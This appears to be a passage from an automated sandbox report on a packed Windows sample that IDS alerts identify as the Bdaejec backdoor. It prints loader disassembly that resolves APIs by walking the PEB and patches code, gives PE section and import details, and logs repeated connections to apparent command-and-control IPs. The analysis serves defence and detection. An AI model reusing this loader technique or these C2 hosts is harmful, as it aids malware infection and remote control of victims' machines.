                                                          mov dword ptr [ebp-20h], eax
                                                          mov dword ptr [ebp-18h], eax
                                                          mov dword ptr [ebp-48h], 64465356h
                                                          mov dword ptr [ebp-44h], 652E4F6Fh
                                                          mov dword ptr [ebp-40h], 00006578h
                                                          mov dword ptr [ebp-3Ch], 00000000h
                                                          call 00007FB2B4CE7CB5h
                                                          pop eax
                                                          add eax, 00000225h
                                                          mov dword ptr [ebp-04h], eax
                                                          mov eax, dword ptr fs:[00000030h]
                                                          mov dword ptr [ebp-28h], eax
                                                          mov eax, dword ptr [ebp-04h]
                                                          mov dword ptr [eax], E904C483h
                                                          mov eax, dword ptr [ebp-04h]
                                                          mov dword ptr [eax+04h], FFFFBEDBh
                                                          mov eax, dword ptr [ebp-28h]
                                                          mov eax, dword ptr [eax+0Ch]
                                                          mov eax, dword ptr [eax+1Ch]
                                                          mov eax, dword ptr [eax]
                                                          mov eax, dword ptr [eax+08h]
                                                          mov ecx, dword ptr [eax+3Ch]
                                                          mov ecx, dword ptr [ecx+eax+78h]
                                                          add ecx, eax
                                                          mov edi, dword ptr [ecx+1Ch]
                                                          mov ebx, dword ptr [ecx+20h]
                                                          mov esi, dword ptr [ecx+24h]
                                                          mov ecx, dword ptr [ecx+18h]
                                                          add esi, eax
                                                          add edi, eax
                                                          add ebx, eax
                                                          xor edx, edx
                                                          mov dword ptr [ebp-30h], esi
                                                          mov dword ptr [ebp-1Ch], edx
                                                          mov dword ptr [ebp-34h], ecx
                                                          cmp edx, dword ptr [ebp-34h]
                                                          jnc 00007FB2B4CE7DFEh
                                                          movzx ecx, word ptr [esi+edx*2]
                                                          mov edx, dword ptr [ebx+edx*4]
                                                          mov esi, dword ptr [edi+ecx*4]
                                                          add edx, eax
                                                          mov ecx, dword ptr [edx]
                                                          add esi, eax
                                                          cmp ecx, 4D746547h
                                                          jne 00007FB2B4CE7D04h
                                                          cmp dword ptr [edx+04h], 6C75646Fh
                                                          jne 00007FB2B4CE7CFBh
                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x12d0000x14c.MPRESS2
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x12e0000x211c.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x12d0780x28.MPRESS2
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .MPRESS10x10000x12c0000x10d800cb4d04236c79a38a742dba09df39c055False1.000313442138219data7.999833456794264IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .MPRESS20x12d0000xcb60xe0067e9ff663d269c9e5c661bde607f11eeFalse0.5373883928571429data5.721564333416146IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0x12e0000x211c0x2200dfbf5319d38faa59f68e537dff927c93False0.3135340073529412data5.139665312198854IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          Tu30x1310000x50000x4200cbb93c7fe3db42b8fb8befb091037076False0.7775213068181818data6.934576836261578IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_ICON0x12e0780xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304ChineseChina0.3640724946695096
                                                          RT_ICON0x12ef480x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024ChineseChina0.506768953068592
                                                          RT_ICON0x12f8180x568Device independent bitmap graphic, 16 x 32 x 8, image size 256ChineseChina0.6813583815028902
                                                          RT_GROUP_ICON0x12fdc00x30dataChineseChina0.875
                                                          RT_MANIFEST0x12fe300x2eaXML 1.0 document, ASCII text, with CRLF line terminatorsChineseChina0.5268096514745308
                                                          DLLImport
                                                          KERNEL32.DLLGetModuleHandleA, GetProcAddress
                                                          ADVAPI32.dllOpenServiceA
                                                          SHELL32.dllSHGetSpecialFolderPathW
                                                          MSVCRT.dllatoi
                                                          USER32.dllwsprintfA
                                                          Language of compilation systemCountry where language is spokenMap
                                                          ChineseChina
                                                          TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                          2024-07-25T12:00:06.397472+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434973720.114.59.183192.168.2.4
                                                          2024-07-25T11:59:27.936291+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49730799192.168.2.444.221.84.105
                                                          2024-07-25T12:00:50.771932+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434974320.114.59.183192.168.2.4
                                                          2024-07-25T11:59:27.472112+0200UDP2838522ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup5065253192.168.2.41.1.1.1
                                                          2024-07-25T12:00:12.790180+0200TCP2028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update49742443192.168.2.452.168.117.173
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jul 25, 2024 11:59:27.494664907 CEST49730799192.168.2.444.221.84.105
                                                          Jul 25, 2024 11:59:27.500339031 CEST7994973044.221.84.105192.168.2.4
                                                          Jul 25, 2024 11:59:27.503941059 CEST49730799192.168.2.444.221.84.105
                                                          Jul 25, 2024 11:59:27.506061077 CEST49730799192.168.2.444.221.84.105
                                                          Jul 25, 2024 11:59:27.511260033 CEST7994973044.221.84.105192.168.2.4
                                                          Jul 25, 2024 11:59:27.936146975 CEST7994973044.221.84.105192.168.2.4
                                                          Jul 25, 2024 11:59:27.936290979 CEST49730799192.168.2.444.221.84.105
                                                          Jul 25, 2024 11:59:27.936295986 CEST7994973044.221.84.105192.168.2.4
                                                          Jul 25, 2024 11:59:27.936364889 CEST49730799192.168.2.444.221.84.105
                                                          Jul 25, 2024 11:59:27.938086033 CEST49730799192.168.2.444.221.84.105
                                                          Jul 25, 2024 11:59:27.943507910 CEST7994973044.221.84.105192.168.2.4
                                                          Jul 25, 2024 12:02:28.364252090 CEST4974419999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:28.371787071 CEST199994974488.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:28.371867895 CEST4974419999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:28.373641014 CEST4974419999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:28.381577969 CEST199994974488.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:28.381592989 CEST199994974488.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:28.645642042 CEST4974419999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:28.694094896 CEST199994974488.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:28.853899956 CEST199994974488.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:28.853965044 CEST4974419999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:29.245162964 CEST4974519999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:29.252357960 CEST19999497455.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:29.252453089 CEST4974519999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:29.252641916 CEST4974519999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:29.260554075 CEST19999497455.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:29.261081934 CEST19999497455.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:29.666696072 CEST4974519999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:29.713999033 CEST19999497455.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:29.724936008 CEST19999497455.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:29.724994898 CEST4974519999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:30.394701958 CEST4974619999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:30.401473999 CEST199994974688.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:30.401580095 CEST4974619999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:30.401751041 CEST4974619999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:30.408406973 CEST199994974688.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:30.409204960 CEST199994974688.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:30.660840988 CEST4974619999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:30.714009047 CEST199994974688.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:30.878566027 CEST199994974688.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:30.878664017 CEST4974619999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:31.175462961 CEST4974719999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:31.180623055 CEST199994974788.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:31.180706024 CEST4974719999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:31.180879116 CEST4974719999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:31.185959101 CEST199994974788.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:31.186021090 CEST199994974788.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:31.660840988 CEST4974719999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:31.671854973 CEST199994974788.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:31.671915054 CEST4974719999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:32.262881041 CEST4974819999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:32.268300056 CEST199994974888.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:32.268377066 CEST4974819999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:32.268635988 CEST4974819999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:32.273526907 CEST199994974888.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:32.274009943 CEST199994974888.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:32.661277056 CEST4974819999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:32.713994026 CEST199994974888.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:32.724138975 CEST199994974888.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:32.728025913 CEST4974819999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:33.380003929 CEST4974919999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:33.384799004 CEST199994974988.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:33.384922981 CEST4974919999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:33.385164022 CEST4974919999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:33.390091896 CEST199994974988.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:33.390121937 CEST199994974988.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:33.879698992 CEST4974919999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:33.887609005 CEST199994974988.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:33.887691975 CEST4974919999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:34.395910025 CEST4975019999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:34.400813103 CEST199994975088.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:34.400896072 CEST4975019999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:34.401041031 CEST4975019999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:34.405913115 CEST199994975088.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:34.406008005 CEST199994975088.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:34.879664898 CEST4975019999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:35.085191965 CEST199994975088.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:35.085261106 CEST4975019999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:35.463359118 CEST4975119999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:35.468746901 CEST199994975188.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:35.468828917 CEST4975119999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:35.469060898 CEST4975119999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:35.477696896 CEST199994975188.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:35.477710009 CEST199994975188.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:35.879641056 CEST4975119999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:35.926196098 CEST199994975188.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:36.177150011 CEST199994975188.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:36.177225113 CEST4975119999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:36.178270102 CEST199994975188.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:36.178324938 CEST4975119999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:36.185461044 CEST199994975188.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:36.411401987 CEST4975219999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:36.421920061 CEST19999497525.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:36.422013998 CEST4975219999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:36.422288895 CEST4975219999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:36.430347919 CEST19999497525.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:36.431648016 CEST19999497525.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:36.879770994 CEST4975219999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:36.893965960 CEST19999497525.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:36.894036055 CEST4975219999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:37.628921032 CEST4975319999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:37.636893034 CEST19999497535.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:37.636974096 CEST4975319999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:37.637110949 CEST4975319999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:37.643623114 CEST19999497535.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:37.644901991 CEST19999497535.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:38.129451990 CEST4975319999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:38.134840012 CEST19999497535.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:38.134903908 CEST4975319999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:38.658396006 CEST4975419999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:38.663189888 CEST199994975488.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:38.663275003 CEST4975419999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:38.663475037 CEST4975419999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:38.668380976 CEST199994975488.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:38.668471098 CEST199994975488.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:39.145061016 CEST4975419999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:39.150563002 CEST199994975488.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:39.151108027 CEST4975419999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:39.664403915 CEST4975519999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:39.669889927 CEST199994975588.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:39.669954062 CEST4975519999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:39.670140028 CEST4975519999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:39.675024033 CEST199994975588.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:39.675160885 CEST199994975588.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:40.145267963 CEST4975519999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:40.156692028 CEST199994975588.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:40.156797886 CEST4975519999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:40.760878086 CEST4975619999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:40.778040886 CEST19999497565.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:40.778161049 CEST4975619999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:40.778388023 CEST4975619999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:40.785809040 CEST19999497565.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:40.785881042 CEST19999497565.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:41.254532099 CEST4975619999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:41.341972113 CEST19999497565.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:41.433361053 CEST19999497565.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:41.433517933 CEST4975619999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:41.994231939 CEST4975719999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:41.999401093 CEST19999497575.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:41.999484062 CEST4975719999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:41.999670029 CEST4975719999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:42.010030031 CEST19999497575.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:42.013045073 CEST19999497575.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:42.489044905 CEST4975719999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:42.497863054 CEST19999497575.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:42.497937918 CEST4975719999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:43.000159979 CEST4975819999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:43.005491972 CEST19999497585.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:43.005568027 CEST4975819999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:43.005789042 CEST4975819999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:43.010612965 CEST19999497585.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:43.010752916 CEST19999497585.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:43.489037037 CEST4975819999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:43.494905949 CEST19999497585.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:43.495018959 CEST4975819999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:44.003106117 CEST4975919999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:44.008023024 CEST19999497595.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:44.008124113 CEST4975919999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:44.008321047 CEST4975919999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:44.013087988 CEST19999497595.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:44.013358116 CEST19999497595.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:44.489089966 CEST4975919999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:44.494602919 CEST19999497595.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:44.494667053 CEST4975919999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:45.000878096 CEST4976019999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:45.006484985 CEST199994976088.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:45.006582975 CEST4976019999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:45.006835938 CEST4976019999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:45.011581898 CEST199994976088.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:45.011647940 CEST199994976088.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:45.489051104 CEST4976019999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:45.806828976 CEST4976019999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:46.410620928 CEST4976019999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:46.439877987 CEST199994976088.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:46.439958096 CEST4976019999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:46.440644026 CEST199994976088.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:46.440695047 CEST4976019999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:46.441317081 CEST199994976088.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:46.441380024 CEST4976019999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:46.445826054 CEST199994976088.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:46.445883036 CEST4976019999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:46.447902918 CEST199994976088.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:46.447949886 CEST4976019999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:46.449287891 CEST199994976088.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:46.449353933 CEST4976019999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:46.455681086 CEST4976119999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:46.462920904 CEST19999497615.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:46.463016033 CEST4976119999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:46.463242054 CEST4976119999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:46.468075037 CEST19999497615.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:46.470058918 CEST19999497615.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:46.957741022 CEST4976119999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:46.969341993 CEST19999497615.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:46.969418049 CEST4976119999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:47.726118088 CEST4976219999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:47.732681036 CEST19999497625.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:47.732749939 CEST4976219999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:47.742626905 CEST4976219999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:47.749129057 CEST19999497625.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:47.749139071 CEST19999497625.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:48.235655069 CEST4976219999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:48.254014015 CEST19999497625.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:48.254066944 CEST4976219999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:48.903141022 CEST4976319999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:48.910938025 CEST199994976388.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:48.911051035 CEST4976319999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:48.911735058 CEST4976319999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:48.917465925 CEST199994976388.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:48.917613029 CEST199994976388.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:49.238930941 CEST4976319999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:49.292496920 CEST199994976388.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:49.407138109 CEST199994976388.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:49.407279968 CEST4976319999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:49.753251076 CEST4976419999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:49.758315086 CEST199994976488.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:49.758373976 CEST4976419999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:49.758584023 CEST4976419999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:49.764147997 CEST199994976488.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:49.764168024 CEST199994976488.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:50.241446018 CEST4976419999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:50.551140070 CEST4976419999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:51.160528898 CEST4976419999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:51.232258081 CEST199994976488.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:51.232325077 CEST4976419999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:51.234056950 CEST199994976488.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:51.234116077 CEST4976419999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:51.235518932 CEST199994976488.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:51.235564947 CEST4976419999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:51.244107962 CEST199994976488.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:51.244158030 CEST4976419999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:51.244582891 CEST199994976488.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:51.244625092 CEST4976419999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:51.245837927 CEST199994976488.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:51.245877028 CEST4976419999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:51.251887083 CEST4976519999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:51.256943941 CEST199994976588.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:51.257041931 CEST4976519999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:51.257242918 CEST4976519999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:51.262342930 CEST199994976588.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:51.262382984 CEST199994976588.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:51.754859924 CEST4976519999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:51.777096033 CEST199994976588.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:51.777167082 CEST4976519999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:52.267343998 CEST4976619999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:52.273642063 CEST19999497665.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:52.273731947 CEST4976619999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:52.273967028 CEST4976619999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:52.281095028 CEST19999497665.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:52.282073021 CEST19999497665.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:52.770781994 CEST4976619999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:52.781078100 CEST19999497665.75.158.61192.168.2.4
                                                          Jul 25, 2024 12:02:52.781135082 CEST4976619999192.168.2.45.75.158.61
                                                          Jul 25, 2024 12:02:53.365572929 CEST4976719999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:53.371135950 CEST199994976788.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:53.371216059 CEST4976719999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:53.371387959 CEST4976719999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:53.376391888 CEST199994976788.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:53.376405954 CEST199994976788.198.117.174192.168.2.4
                                                          Jul 25, 2024 12:02:53.770445108 CEST4976719999192.168.2.488.198.117.174
                                                          Jul 25, 2024 12:02:53.818229914 CEST199994976788.198.117.174192.168.2.4
